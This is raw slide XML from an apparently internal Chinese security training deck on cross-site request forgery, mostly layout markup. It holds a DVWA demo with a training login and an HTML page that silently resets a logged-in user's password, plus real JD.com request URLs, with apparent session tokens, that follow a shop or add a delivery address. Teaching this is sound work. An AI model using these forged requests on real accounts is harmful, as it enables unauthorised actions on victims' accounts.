              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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23" y="-70"/>
            <a:ext cx="11518986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90">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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815975" y="5401945"/>
            <a:ext cx="4586605" cy="650240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F67800"/>
            </a:solidFill>
          </a:ln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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pP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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef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portal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扫描系统链接：http://utest.pp.jd.com/scan/index.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>扫描和修复要求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65" y="1151255"/>
            <a:ext cx="7705725" cy="3952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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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535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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF跨站请求伪造</a:t>
            </a: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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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504190" y="503555"/>
            <a:ext cx="691007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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484505" y="1466215"/>
            <a:ext cx="4606290" cy="44075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、登录http://2sdvwa.jd.com/login.php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初始账号2sadmin，密码2sadmin</a:t>
            </a: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、选择左边的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CSRF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进行演练，出现修改密码的操作页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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、发现浏览器地址栏出现一个修改密码的链接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http://2sdvwa.jd.com/vulnerabilities/csrf/?password_new=111&amp;password_conf=111&amp;Change=Change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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、复制上述链接，构造一个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html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页面，代码如下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&lt;html&gt;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&lt;body&gt;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&lt;b&gt;test csrf&lt;/b&gt;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&lt;img src=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"http://2sdvwa.jd.com/vulnerabilities/csrf/?password_new=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123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&amp;password_conf=1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23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&amp;Change=Change"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&gt;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&lt;/body&gt;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&lt;/html&gt;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515" y="1466215"/>
            <a:ext cx="5781040" cy="2889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035" y="1875790"/>
            <a:ext cx="3942715" cy="34474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6540" y="2007870"/>
            <a:ext cx="5888355" cy="3546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allAtOnce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504190" y="503555"/>
            <a:ext cx="691007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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="1311275"/>
            <a:ext cx="4618990" cy="44075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HTML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页面代码：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&lt;html&gt;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&lt;body&gt;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&lt;b&gt;test csrf&lt;/b&gt;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&lt;img src=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"http://2sdvwa.jd.com/vulnerabilities/csrf/?password_new=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123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&amp;password_conf=1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23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&amp;Change=Change"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&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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、在已经登录的情况下点击打开这个文件，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src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自动发出请求，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在不知觉的时候发出了将密码改成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123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的请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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、退出系统，重新登录发现用原来的密码登录登录失败了</a:t>
            </a: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、用刚刚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html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页面里面的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123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登录密码，登录成功，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Chrome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弹窗提示我密码已经更换了</a:t>
            </a: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690" y="1226185"/>
            <a:ext cx="3185795" cy="32486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690" y="4027805"/>
            <a:ext cx="3748405" cy="13919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allAtOnce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504190" y="503555"/>
            <a:ext cx="691007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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318770" y="1332230"/>
            <a:ext cx="10889615" cy="3308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正常请求和伪造请求的差异：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Referer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不一样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15" y="1845945"/>
            <a:ext cx="11028680" cy="42284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9455" y="5265420"/>
            <a:ext cx="5123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正常请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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Referer: http://2sdvwa.jd.com/vulnerabilities/csrf/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88735" y="5314315"/>
            <a:ext cx="49911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伪造请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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没有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Referer（直接浏览器输入修改密码的链接按回车）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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4190" y="503555"/>
            <a:ext cx="6860540" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简介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409190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669290" y="1477645"/>
            <a:ext cx="8894445" cy="3747135"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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跨站请求伪造，Cross Site Request Forgery。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是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。。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CSRF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利用了web中用户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身份验证的一个漏洞：简单的身份验证只能保证请求发自某个用户的浏览器，却不能保证请求本身是用户自愿发出的。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简单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来说攻击者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并未能实际获取你的身份信息，通过诱使你点击链接，在你并未实际授权的情况下进行操作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，完成攻击。</a:t>
            </a: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40" y="1682750"/>
            <a:ext cx="1047750" cy="8064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4690" y="1932305"/>
            <a:ext cx="19881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漏洞简介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4190" y="503555"/>
            <a:ext cx="6860540" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简介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409190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669290" y="1262380"/>
            <a:ext cx="8894445" cy="4424680"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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漏洞影响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在用户不知情、未授权的情况下做敏感操作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盗取用户隐私数据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攻击管理员，添加后台帐号权限等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对应到京东的业务，可能会发生下单、商品被退货了等等类似情况发生</a:t>
            </a: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攻击方式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HTML CSRF攻击（发起的CSRF请求都属于HTML元素发出的，这一类是最普遍的CSRF攻击）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JSON HiJacking攻击（构造恶意的 JSONP 调用页面，诱导被攻击者访问，然后截取用户敏感信息）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Flash CSRF攻击（通过ActionScript脚本来完成）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40" y="1467485"/>
            <a:ext cx="1047750" cy="8064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4690" y="1717040"/>
            <a:ext cx="19881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漏洞简介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380681" y="1230083"/>
            <a:ext cx="4263194" cy="663786"/>
            <a:chOff x="889616" y="3169425"/>
            <a:chExt cx="3758818" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="889616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0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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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7" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1473434" y="3196940"/>
              <a:ext cx="3175000" cy="557828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sz="160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京东主站CSRF 商铺刷粉</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="da-DK" altLang="zh-CN" kern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8" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5962087" y="1225887"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="1205946" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1205946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2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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9" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1916296" y="3196940"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US" sz="16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利用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="16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CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="16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添加默认收货地址</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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949960" y="1657985"/>
            <a:ext cx="5068570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访问链接：</a:t>
            </a:r>
            <a:r>
              <a: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https://item.m.jd.com/product/1610762139.html</a:t>
            </a:r>
            <a:endParaRPr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功能点</a:t>
            </a:r>
            <a:r>
              <a:rPr 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关注店铺</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr 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如下</a:t>
            </a:r>
            <a:r>
              <a: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url就关注该商铺了</a:t>
            </a:r>
            <a:r>
              <a:rPr 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https://item.m.jd.com/user/venderFavorite.json?sid=1585d46599a993bdb93e581a119fd238&amp;wareId=1610762139&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr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shopId=25789</a:t>
            </a:r>
            <a:r>
              <a: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&amp;type=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6696075" y="1657985"/>
            <a:ext cx="4664710" cy="2891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功能点：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添加默认收货地址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访问如下链接可以添加默认收货地址：</a:t>
            </a:r>
          </a:p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http://wqdeal2.jd.com/deal/recvaddr/addrecvaddr4jdv2?callback=cbHandleRecvAddrA&amp;r=0.7733941439073533&amp;rgid=&amp;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name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=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小明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mobile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=13412341234&amp;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addrdetail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=某某村&amp;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addrfull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=广东省深圳市宝安区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***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addrname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=某某村的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小明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&amp;provinceid=5&amp;cityid=199&amp;countyid=47213&amp;townid=47705&amp;label=&amp;token=15172803625F681CDB1EF960482F809C6C125B3F3A3BDA0FE0&amp;default=0&amp;sceneval=2</a:t>
            </a:r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504190" y="513080"/>
            <a:ext cx="686054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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年部门案例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6640" y="2070100"/>
            <a:ext cx="4254500" cy="26974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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞类型</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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73863" y="2659698"/>
            <a:ext cx="5759450" cy="1383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据微信手Q业务部安全月报统计</a:t>
            </a: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2018年漏洞类型主要包括：</a:t>
            </a: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XSS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URL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跳转、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信息泄露、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CSRF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越权、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SQL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注入、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CRLF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、暴力破解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5491946" y="1054576"/>
            <a:ext cx="19015" cy="4752528"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="CC3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504190" y="2672715"/>
            <a:ext cx="1503680" cy="1413510"/>
            <a:chOff x="3716337" y="4375151"/>
            <a:chExt cx="1636714" cy="1519238"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4127500" y="4838701"/>
              <a:ext cx="239713" cy="1047750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 32"/>
                <a:gd name="T1" fmla="*/ 140 h 140"/>
                <a:gd name="T2" fmla="*/ 30 w 32"/>
                <a:gd name="T3" fmla="*/ 140 h 140"/>
                <a:gd name="T4" fmla="*/ 28 w 32"/>
                <a:gd name="T5" fmla="*/ 138 h 140"/>
                <a:gd name="T6" fmla="*/ 27 w 32"/>
                <a:gd name="T7" fmla="*/ 4 h 140"/>
                <a:gd name="T8" fmla="*/ 4 w 32"/>
                <a:gd name="T9" fmla="*/ 4 h 140"/>
                <a:gd name="T10" fmla="*/ 4 w 32"/>
                <a:gd name="T11" fmla="*/ 138 h 140"/>
                <a:gd name="T12" fmla="*/ 2 w 32"/>
                <a:gd name="T13" fmla="*/ 140 h 140"/>
                <a:gd name="T14" fmla="*/ 2 w 32"/>
                <a:gd name="T15" fmla="*/ 140 h 140"/>
                <a:gd name="T16" fmla="*/ 0 w 32"/>
                <a:gd name="T17" fmla="*/ 137 h 140"/>
                <a:gd name="T18" fmla="*/ 0 w 32"/>
                <a:gd name="T19" fmla="*/ 2 h 140"/>
                <a:gd name="T20" fmla="*/ 0 w 32"/>
                <a:gd name="T21" fmla="*/ 0 h 140"/>
                <a:gd name="T22" fmla="*/ 2 w 32"/>
                <a:gd name="T23" fmla="*/ 0 h 140"/>
                <a:gd name="T24" fmla="*/ 2 w 32"/>
                <a:gd name="T25" fmla="*/ 0 h 140"/>
                <a:gd name="T26" fmla="*/ 29 w 32"/>
                <a:gd name="T27" fmla="*/ 0 h 140"/>
                <a:gd name="T28" fmla="*/ 31 w 32"/>
                <a:gd name="T29" fmla="*/ 2 h 140"/>
                <a:gd name="T30" fmla="*/ 32 w 32"/>
                <a:gd name="T31" fmla="*/ 138 h 140"/>
                <a:gd name="T32" fmla="*/ 30 w 32"/>
                <a:gd name="T3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140">
                  <a:moveTo>
                    <a:pt x="30" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="140"/>
                    <a:pt x="30" y="140"/>
                    <a:pt x="30" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="140"/>
                    <a:pt x="28" y="139"/>
                    <a:pt x="28" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="112"/>
                    <a:pt x="27" y="19"/>
                    <a:pt x="27" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="4"/>
                    <a:pt x="12" y="4"/>
                    <a:pt x="4" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="31"/>
                    <a:pt x="4" y="107"/>
                    <a:pt x="4" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
